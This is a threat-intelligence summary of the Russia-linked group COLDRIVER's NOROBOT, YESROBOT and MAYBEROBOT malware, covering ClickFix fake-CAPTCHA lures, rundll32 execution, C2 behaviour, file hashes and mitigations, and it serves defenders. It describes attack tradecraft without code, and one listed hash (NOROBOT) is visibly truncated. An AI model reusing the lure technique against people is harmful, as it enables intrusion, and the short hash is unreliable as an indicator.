Full Report
A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased "operations tempo" from the threat actor. The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
Russia-linked hacking group. Associated with the discovery of three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. Some malware variants (NOROBOT and MAYBEROBOT) are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.
## Activity Summary
Since May 2025, the actor has shown an increased "operations tempo," rapidly evolving its malware from the reported LOSTKEYS malware to the new "ROBOT" family. Attacks in January, March, and April 2025 focused on deploying the information stealer LOSTKEYS. Subsequent intrusions have used the new malware family, leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt. The deployment of YESROBOT was observed briefly in late May, suggesting it was a "stopgap mechanism" before switching to the more capable MAYBEROBOT.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Leveraging ClickFix lures, causing users to run malicious PowerShell commands via the Windows Run dialog prompt (fake CAPTCHA verification).
- **Delivery Mechanism:** Initial infection chain uses an HTML lure dubbed COLDCOPY to drop a DLL called NOROBOT, which is executed via `rundll32.exe` to trigger the next-stage malware.
- **Malware Evolution:** Constant evolution and splitting of cryptography keys for the delivery mechanism to evade detection.
- **Evasion:** Early versions of NOROBOT attempted to install Python 3.8, which was deemed "noisy" and discontinued in favor of less suspicious methods.
- **Command and Control (C2):** YESROBOT uses HTTPS to retrieve commands from a hard-coded C2 server. MAYBEROBOT supports downloading/running payloads from specified URLs and executing commands via `cmd.exe` and PowerShell.
- [The text does not explicitly mention MITRE ATT&CK IDs.]
## Targeting
- Sectors: Historically targeted high-profile individuals in NGOs, policy advisors, and dissidents for credential theft. The current activity appears focused on "significant targets."
- Geography: Not explicitly mentioned, but attribution is to a Russian state-sponsored group.
- Victims: Specific organizations were not detailed, only the types of profiles targeted historically (NGOs, policy advisors, dissidents).
## Tools & Infrastructure
- **Malware Families:**
- NOROBOT (tracked as BAITSWITCH by Zscaler)
- YESROBOT (Python backdoor)
- MAYBEROBOT (PowerShell implant, tracked as SIMPLEFIX by Zscaler)
- LOSTKEYS (Previous information stealing malware)
- **C2:** YESROBOT uses HTTPS to communicate with a hard-coded C2 server.
- **Infrastructure:**
- COLDCOPY (HTML lure)
- NOROBOT (DLL)
- YESROBOT (Python backdoor, `bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f`)
- MAYBEROBOT (PowerShell implant, `b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9`)
- NOROBOT (DLL, `2e74f6bd9bf73131d3213399ed2f669edf8ce8196cd70eb6aee`)
- COLDCOPY (Initial dropper, `c4d0fba5aaafa40aef6836ed1414ae3eadc390e1969fdcb3b73c60fe7fb37897`)
## Implications
COLDRIVER demonstrates high operational speed and adaptability, rapidly iterating on malware (five days between reporting LOSTKEYS and deploying new families) to counter detection following public disclosure. The evolution towards the more flexible MAYBEROBOT suggests a focus on persistent, deep intelligence gathering against high-value targets.
## Mitigations
- Focus monitoring on suspicious execution of PowerShell commands triggered via the Windows Run dialog, particularly those following CAPTCHA-style lures.
- Scrutinize the use of `rundll32.exe` to execute unusual binaries like the NOROBOT DLL.
- Deploy enhanced security measures and user awareness training regarding phishing attempts that leverage browser verification lures.
- Monitor for the deployment of Python environments or reliance on Python-based backdoors if deep access is achieved.